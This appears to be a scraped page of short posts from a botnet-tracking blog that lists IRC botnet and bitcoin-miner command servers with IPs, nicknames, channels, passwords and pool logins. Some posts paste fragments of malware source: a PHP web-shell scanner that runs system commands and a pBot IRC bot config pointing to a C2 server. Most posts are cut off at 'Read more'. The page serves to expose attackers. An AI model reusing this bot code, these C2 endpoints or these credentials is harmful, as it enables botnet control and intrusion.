Resolved : [sp.3p.kz] To [87.255.51.229] server: sp.3p.kz port:5050 NICK n[USA|XP]0314676 USER x “” “x” 😡 JOIN #cash hosting infos: http://whois.domaintools.com/87.255.51.229
PitBull CreW StableScanner
Found these heckers today when looking for online users in one board files are encrypted but not hard to decrypt them here u go t: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }Read more...
58.225.75.155(100 linux bots hosted in Korea, Republic Of Seoul Hanaro Telecom Inc.)
i m pasting the whole script u have server and port inside <?php set_time_limit( 0 ); error_reporting( 0 ); ignore_user_abort(true); echo "Success!"; class pBot { var $using_encode = false; var $config = array( 'server' => '58.225.75.155', //server here (base64) 'port' => 9999, 'chan' => 'machine', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"Read more...
dns.domain-crawlers.com(Bitcoin Miner hosted in Germany Hannover Fastcom Ip Net)
Resolved : [dns.domain-crawlers.com] To [212.48.121.103] bitcoin-miner.exe -a 60 -l no -o hxxp://dns.domain-crawlers.com:8332/ -u haqidodges@gmail.com -p password the guy using this shit is a real hecker he uses gmail lol sample bitcoin-miner hosting infos: http://whois.domaintools.com/212.48.121.103
5.231.22.188(Athena bot hosted in Germany Bad Homburg Vor Der Hohe Ghostnet Network Used For Vps Hosting Services)
Sample comes from djmetral thnx to him Server: 5.231.22.188:6667 Nickname: [A|W_XP|2]cznug Username: 18129 Channel: (Password: ) executable is binded with other bot in same server Nick: hAtbLaDe”; Username: 27867 Channel: #Support”; Channel: #Lobby,#IRCd”; Channel: #l34k Channel: #IRCd,#Support,#main with Password letmein,somepass,anotherpass”; Private Message to User VHOST”;: “VHOST”;” #army is the channel for ddos bots(pBots) here theRead more...
rtu.jgieo445.in(irc bot hosted in United States London Santrex Internet Services Ltd.)
server rtu.jgieo445.in PASS 0 port 4707 channel:#botnet (thnx to anonymous guy for finding the channel) NICK [A|W_XP|x32|D]tilcbb USER 23637 8 * :23637 Local users: Current Local Users: 53 Max: 517 Global users: Current Global Users: 53 Max: 517 i dont have the exe to find channels feel free to discover them hosting infos:Read more...
boris and hf hecker
boris a guy who idle into our irc channel irc.trolled.tv #security had a conversation with a botnet owner we had alot of fun reading now is your turn lol <boris> If you want to keep this ircd to yourself, I suggest you listen very carefully. <boris> firstly, a whois will not give you my realRead more...
204.188.227.106(dbot hosted in United States Missoula Sharktech)
IRC Server: 204.188.227.106:6667 Server Pass: m3ga2012Nick: L2-[hfqUsername: tdviyflbb Joined Channel: #ghostChannel Topic for Channel #ghost: “.scan 75 1 189.x.x.x 2 1 189.x.x.x”Private Message to Channel #ghost: “Scanning: 189.x.x.x, 75 threads. Using CFTP.” Hosting Infos: http://whois.domaintools.com/204.188.227.106
versx.net(Bitcoin-Miner hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o.)
Resolved : [versx.net] To [212.7.195.134] Here is the folder with XYZ Bitcoin-Miner passworded rar archive and executable files Here u can find all the rest into passworded rar archives This is the Control Panel he’s selling his produtcs here: hxxp://versx.net/ Hosting infos: http://whois.domaintools.com/212.7.195.134
rickroll.kodingen.com(Bitcoin-Miner hosted in United States Dallas Softlayer Technologies Inc.)
Resolved : [rickroll.kodingen.com] To [173.192.206.162] Gate.php: hxxp://rickroll.kodingen.com/btc/gate.php Login panel: [flags]url=hxxp://pool.itzod.ru:8080/login=acidexence_552pass=tagevuvug hosting infos: http://whois.domaintools.com/173.192.206.162